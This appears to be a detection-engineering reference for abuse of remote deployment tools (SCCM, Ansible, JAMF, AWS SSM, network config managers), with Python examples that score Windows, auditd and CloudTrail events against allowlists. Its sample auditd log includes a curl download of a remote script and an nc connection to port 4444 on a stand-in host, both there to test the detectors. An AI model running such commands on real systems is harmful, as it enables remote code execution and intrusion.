Detects SCCM, Intune, or other remote push execution spawning scripts or binaries from SYSTEM context or from unusual consoles (e.g., cmtrace.exe, the SCCM log viewer, launching PowerShell or cmd.exe).

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Application Log Content (DC0038) | WinEventLog:Application | SCCM, Intune logs |

| Field | Description |
|---|---|
| ParentImageList | Allowlist of known SCCM-related binary spawners (e.g., 'CCMExec.exe') |
| UserContext | Expected deployment activity from scheduled system accounts |
| TimeWindow | Unusual deployment timing outside standard maintenance hours |
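
The following is an added worked example, not part of the ATT&CK content above: Python that applies the ParentImageList, UserContext and TimeWindow elements to Security 4688 events. The allowlist, the LocalSystem SID check, the 01:00-05:00 window and the four sample events are hypothetical values constructed for the demonstration.

```python
# Added example (not from the ATT&CK page): evaluate Security 4688 events
# against ParentImageList, UserContext and TimeWindow. All tuning values and
# the sample events below are hypothetical.
from datetime import datetime, time

PARENT_IMAGE_LIST = {"ccmexec.exe"}              # hypothetical: known deployment spawners
EXPECTED_DEPLOY_SID = "S-1-5-18"                 # LocalSystem; the SCCM client service runs here
MAINTENANCE_WINDOW = (time(1, 0), time(5, 0))    # hypothetical 01:00-05:00 local
UNUSUAL_CONSOLES = {"cmtrace.exe"}               # log viewer; never a legitimate shell parent
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}


def image_name(path):
    """Lower-cased file name from a 4688 image path (either separator)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_maintenance_window(ts, window=MAINTENANCE_WINDOW):
    """True when ts falls inside the window; handles windows crossing midnight."""
    start, end = window
    t = ts.time()
    if start <= end:
        return start <= t <= end
    return t >= start or t <= end


def evaluate_4688(event):
    """Return the reasons a 4688 event should alert; empty list means benign.

    event keys mirror 4688 fields: ParentProcessName, NewProcessName,
    SubjectUserSid, TimeCreated (datetime).
    """
    parent = image_name(event["ParentProcessName"])
    child = image_name(event["NewProcessName"])
    reasons = []
    if child not in SCRIPT_HOSTS:
        return reasons                       # only script/shell hosts are in scope
    if parent in UNUSUAL_CONSOLES:
        reasons.append(f"unusual console {parent} spawned {child}")
    if parent in PARENT_IMAGE_LIST:
        # Known deployment spawner: legitimate only from the expected account
        # (UserContext) and inside the maintenance window (TimeWindow).
        if event["SubjectUserSid"] != EXPECTED_DEPLOY_SID:
            reasons.append(f"{parent} spawned {child} as {event['SubjectUserSid']}, not LocalSystem")
        if not in_maintenance_window(event["TimeCreated"]):
            reasons.append(f"{parent} spawned {child} at {event['TimeCreated']:%H:%M}, outside maintenance window")
    return reasons


# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    {   # scheduled SCCM deployment: expected parent, SYSTEM, inside window
        "ParentProcessName": r"C:\Windows\CCM\CcmExec.exe",
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "SubjectUserSid": "S-1-5-18",
        "TimeCreated": datetime(2024, 3, 12, 2, 30),
    },
    {   # log viewer launching a shell under an interactive user
        "ParentProcessName": r"C:\Program Files (x86)\ConfigMgr 2012 Toolkit R2\ClientTools\CMTrace.exe",
        "NewProcessName": r"C:\Windows\System32\cmd.exe",
        "SubjectUserSid": "S-1-5-21-1004336348-1177238915-682003330-1001",
        "TimeCreated": datetime(2024, 3, 12, 14, 0),
    },
    {   # expected parent and account, but mid-afternoon
        "ParentProcessName": r"C:\Windows\CCM\CcmExec.exe",
        "NewProcessName": r"C:\Windows\System32\cmd.exe",
        "SubjectUserSid": "S-1-5-18",
        "TimeCreated": datetime(2024, 3, 12, 14, 5),
    },
    {   # non-script child: out of scope for this analytic
        "ParentProcessName": r"C:\Windows\CCM\CcmExec.exe",
        "NewProcessName": r"C:\Windows\System32\notepad.exe",
        "SubjectUserSid": "S-1-5-18",
        "TimeCreated": datetime(2024, 3, 12, 14, 5),
    },
]


def triage(events=SAMPLE_EVENTS):
    """Map event index -> reasons, for the events that alert."""
    findings = {}
    for i, event in enumerate(events):
        reasons = evaluate_4688(event)
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for i, reasons in triage().items():
        print(i, "; ".join(reasons))
```

Only the first event is silent: the cmtrace.exe spawn alerts on the parent alone, and the third alerts purely on timing even though parent and account are expected. A tuned deployment in production would load the window and parent list from the site's maintenance schedule rather than constants.
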

Detects remote scripts or binaries deployed via Puppet, Chef, Ansible, or shell scripts pushed from orchestration servers, executing outside maintenance windows or on unmanaged nodes.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |

| Field | Description |
|---|---|
| DeployingHostAllowList | Approved orchestration or jump box IPs |
| ScriptExecutionBaseline | Expected scripts, interpreters, or package managers used |
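
The following is an added worked example, not part of the ATT&CK content above: Python that ties each auditd execve back to the SSH session that owns it (USER_LOGIN addr= correlated on ses=) and then applies DeployingHostAllowList and ScriptExecutionBaseline. It assumes an audit rule that tags execve with key "exec"; the allowlist, baseline and log lines are constructed for the demonstration.

```python
# Added example (not from the ATT&CK page): correlate auditd execve records
# with the login that owns the session, then apply DeployingHostAllowList and
# ScriptExecutionBaseline. Assumes a rule such as
#   -a always,exit -F arch=b64 -S execve -k exec
# so SYSCALL records carry key="exec". Values and log lines are hypothetical.
import re

DEPLOYING_HOST_ALLOW_LIST = {"10.0.5.20"}        # hypothetical Ansible controller
SCRIPT_EXECUTION_BASELINE = {"/usr/bin/python3", "/usr/bin/apt-get", "/usr/bin/dpkg"}

KV_RE = re.compile(r"""(\w+)=('[^']*'|"[^"]*"|\S+)""")
SERIAL_RE = re.compile(r"audit\(\d+\.\d+:(\d+)\)")

# Constructed auditd lines: two SSH logins, then three execve events
SAMPLE_LOG = '''\
type=USER_LOGIN msg=audit(1710208800.100:200): pid=1200 uid=0 auid=1001 ses=42 msg='op=login id=1001 exe="/usr/sbin/sshd" hostname=? addr=10.0.5.20 terminal=ssh res=success'
type=USER_LOGIN msg=audit(1710208805.300:201): pid=1250 uid=0 auid=1001 ses=43 msg='op=login id=1001 exe="/usr/sbin/sshd" hostname=? addr=198.51.100.7 terminal=ssh res=success'
type=SYSCALL msg=audit(1710208810.500:202): arch=c000003e syscall=59 success=yes exit=0 ppid=1300 pid=1301 auid=1001 uid=1001 gid=1001 ses=42 comm="python3" exe="/usr/bin/python3" key="exec"
type=EXECVE msg=audit(1710208810.500:202): argc=2 a0="/usr/bin/python3" a1="/home/deploy/.ansible/tmp/AnsiballZ_apt.py"
type=SYSCALL msg=audit(1710208820.700:203): arch=c000003e syscall=59 success=yes exit=0 ppid=1350 pid=1351 auid=1001 uid=1001 gid=1001 ses=43 comm="curl" exe="/usr/bin/curl" key="exec"
type=EXECVE msg=audit(1710208820.700:203): argc=3 a0="/usr/bin/curl" a1="-fsSL" a2="http://198.51.100.7/x.sh"
type=SYSCALL msg=audit(1710208830.900:204): arch=c000003e syscall=59 success=yes exit=0 ppid=1300 pid=1360 auid=1001 uid=1001 gid=1001 ses=42 comm="nc" exe="/usr/bin/nc" key="exec"
type=EXECVE msg=audit(1710208830.900:204): argc=3 a0="/usr/bin/nc" a1="198.51.100.7" a2="4444"
'''.splitlines()


def parse_record(line):
    """Flatten one raw auditd record into a dict.

    USER_LOGIN nests its details inside msg='...'; that inner string is parsed
    and merged so addr=, terminal= and res= become top-level keys.
    """
    fields = {}
    for key, value in KV_RE.findall(line):
        if value[:1] in ("'", '"'):
            value = value[1:-1]
        fields[key] = value
    nested = fields.get("msg", "")
    if "=" in nested:
        fields.update(parse_record(nested))
    return fields


def serial_of(line):
    """Event serial from audit(<ts>:<serial>); SYSCALL and EXECVE share it."""
    return SERIAL_RE.search(line).group(1)


def analyze(lines):
    """Return one alert dict per execve that violates either mutable element."""
    session_source = {}   # ses -> remote addr from a successful login
    pending = {}          # serial -> SYSCALL fields awaiting the EXECVE record
    alerts = []
    for line in lines:
        rec = parse_record(line)
        rtype = rec.get("type")
        if rtype == "USER_LOGIN" and rec.get("res") == "success":
            session_source[rec["ses"]] = rec.get("addr")
        elif rtype == "SYSCALL" and rec.get("key") == "exec":
            pending[serial_of(line)] = rec
        elif rtype == "EXECVE":
            sc = pending.pop(serial_of(line), None)
            if sc is None:
                continue
            argv = [rec.get(f"a{i}", "") for i in range(int(rec.get("argc", "0")))]
            src = session_source.get(sc.get("ses"))
            reasons = []
            if src is None:
                reasons.append(f"session {sc.get('ses')} has no recorded login source")
            elif src not in DEPLOYING_HOST_ALLOW_LIST:
                reasons.append(f"exec from unapproved host {src}")
            if sc.get("exe") not in SCRIPT_EXECUTION_BASELINE:
                reasons.append(f"{sc.get('exe')} is outside the execution baseline")
            if reasons:
                alerts.append({"serial": serial_of(line), "ses": sc.get("ses"), "src": src,
                               "exe": sc.get("exe"), "argv": argv, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert["serial"], alert["src"], " ".join(alert["argv"]), "|", "; ".join(alert["reasons"]))
```

The Ansible-style python3 execve from the controller passes both checks; the curl from 198.51.100.7 fails both; the nc launched inside the approved session fails only the baseline, which is the case a pure source-IP allowlist would miss. Real auditd hex-encodes arguments containing spaces, so a production parser needs to decode those before matching.
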

Detects script or binary execution initiated via JAMF, Munki, or custom MDM agents outside of baseline, or JAMF launching new Terminal or osascript processes from remote command payloads.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | process and signing chain events |
| Application Log Content (DC0038) | macos:jamf | RemoteCommandExecution |

| Field | Description |
|---|---|
| SigningAuthorityList | Expected signing authorities for JAMF and MDM scripts |
| RemoteCommandInterval | Frequency of remote execution from MDM servers |

Detects cloud-native software deployment or management (e.g., SSM Run Command, Intune) initiating script execution on endpoints outside expected org IDs, admin groups, or maintenance windows.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | AWS:CloudTrail | SendCommand (eventSource ssm.amazonaws.com) |

| Field | Description |
|---|---|
| IAMRoleAllowList | Approved deployment administrators or service accounts |
| ExecutionTargetList | Expected endpoints targeted by SaaS deployments |
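
The following is an added worked example, not part of the ATT&CK content above: Python that applies IAMRoleAllowList and ExecutionTargetList (plus an expected-account check for the org ID condition) to CloudTrail records for ssm:SendCommand. The role ARNs, account ID, instance IDs, approved document names and the three sample records are constructed for the demonstration.

```python
# Added example (not from the ATT&CK page): apply IAMRoleAllowList,
# ExecutionTargetList and an expected-account check to CloudTrail
# ssm:SendCommand records. Every identifier below is hypothetical.
import json

IAM_ROLE_ALLOW_LIST = {
    "arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-scheduler",
}
EXPECTED_ACCOUNT_IDS = {"111122223333"}
EXECUTION_TARGET_LIST = {"i-0a1b2c3d4e5f67890", "i-0f1e2d3c4b5a69788"}
APPROVED_DOCUMENTS = {"AWS-RunPatchBaseline", "AWS-ConfigureAWSPackage"}


def resolve_targets(params):
    """Explicit instance IDs, plus any selector (tag or resource group) that
    cannot be resolved offline, returned separately for manual review."""
    ids = set(params.get("instanceIds") or [])
    unresolved = []
    for target in params.get("targets") or []:
        # SSM Target members are Key/Values; accept lower-case too in case the
        # trail normalises them (assumption).
        key = target.get("Key", target.get("key", ""))
        values = target.get("Values", target.get("values", [])) or []
        if key == "InstanceIds":
            ids.update(values)
        else:
            unresolved.append(f"{key}={','.join(values)}")
    return ids, unresolved


def evaluate_send_command(event):
    """Reasons a SendCommand record should alert; empty list means expected."""
    if event.get("eventSource") != "ssm.amazonaws.com" or event.get("eventName") != "SendCommand":
        return []
    reasons = []
    identity = event.get("userIdentity", {})
    if identity.get("arn") not in IAM_ROLE_ALLOW_LIST:
        reasons.append(f"principal {identity.get('arn')} not in IAMRoleAllowList")
    if identity.get("accountId") not in EXPECTED_ACCOUNT_IDS:
        reasons.append(f"caller account {identity.get('accountId')} is not an expected org account")
    params = event.get("requestParameters") or {}
    ids, unresolved = resolve_targets(params)
    unexpected = sorted(ids - EXECUTION_TARGET_LIST)
    if unexpected:
        reasons.append("targets outside ExecutionTargetList: " + ", ".join(unexpected))
    if unresolved:
        reasons.append("selector-based targeting needs manual review: " + "; ".join(unresolved))
    if params.get("documentName") not in APPROVED_DOCUMENTS:
        reasons.append(f"document {params.get('documentName')} not approved for this pipeline")
    return reasons


# Constructed CloudTrail records, trimmed to the fields used here
SAMPLE_TRAIL = json.loads("""[
  {"eventID": "e1", "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
   "eventTime": "2024-03-12T02:15:00Z", "sourceIPAddress": "10.0.9.15",
   "userIdentity": {"type": "AssumedRole", "accountId": "111122223333",
                    "arn": "arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-scheduler"},
   "requestParameters": {"documentName": "AWS-RunPatchBaseline",
                         "instanceIds": ["i-0a1b2c3d4e5f67890", "i-0f1e2d3c4b5a69788"]}},
  {"eventID": "e2", "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
   "eventTime": "2024-03-12T15:42:11Z", "sourceIPAddress": "203.0.113.44",
   "userIdentity": {"type": "IAMUser", "accountId": "111122223333",
                    "arn": "arn:aws:iam::111122223333:user/contractor"},
   "requestParameters": {"documentName": "AWS-RunShellScript",
                         "instanceIds": ["i-0badbadbadbadbad0"]}},
  {"eventID": "e3", "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
   "eventTime": "2024-03-12T03:05:00Z", "sourceIPAddress": "10.0.9.15",
   "userIdentity": {"type": "AssumedRole", "accountId": "111122223333",
                    "arn": "arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-scheduler"},
   "requestParameters": {"documentName": "AWS-RunPatchBaseline",
                         "targets": [{"Key": "tag:Role", "Values": ["web"]}]}}
]""")


def triage(records=SAMPLE_TRAIL):
    """Map eventID -> reasons, for the records that alert."""
    findings = {}
    for record in records:
        reasons = evaluate_send_command(record)
        if reasons:
            findings[record["eventID"]] = reasons
    return findings


if __name__ == "__main__":
    for event_id, reasons in triage().items():
        print(event_id, "|", "; ".join(reasons))
```

e1 is the scheduled patch run and stays silent. e2 trips three checks at once (unknown IAM user, unknown target, ad hoc RunShellScript document). e3 comes from the approved role but targets by tag, which an allowlist of instance IDs cannot verify offline, so it is surfaced for review rather than silently accepted; resolving the tag against the account's inventory would be the next step in a production pipeline.
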

Detects central router or switch config management tools (e.g., FortiManager, Cisco Prime) triggering device reboots or config pushes using abnormal accounts or IPs.

| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | networkdevice:syslog | config push events |
| Network Traffic Flow (DC0078) | NSM:Flow | Device-to-Device Deployment Flows |

| Field | Description |
|---|---|
| PushSourceAllowList | Management devices or IPs allowed to push firmware, configuration, or scripts |
| AuthUserPattern | Expected CLI or API user performing configuration |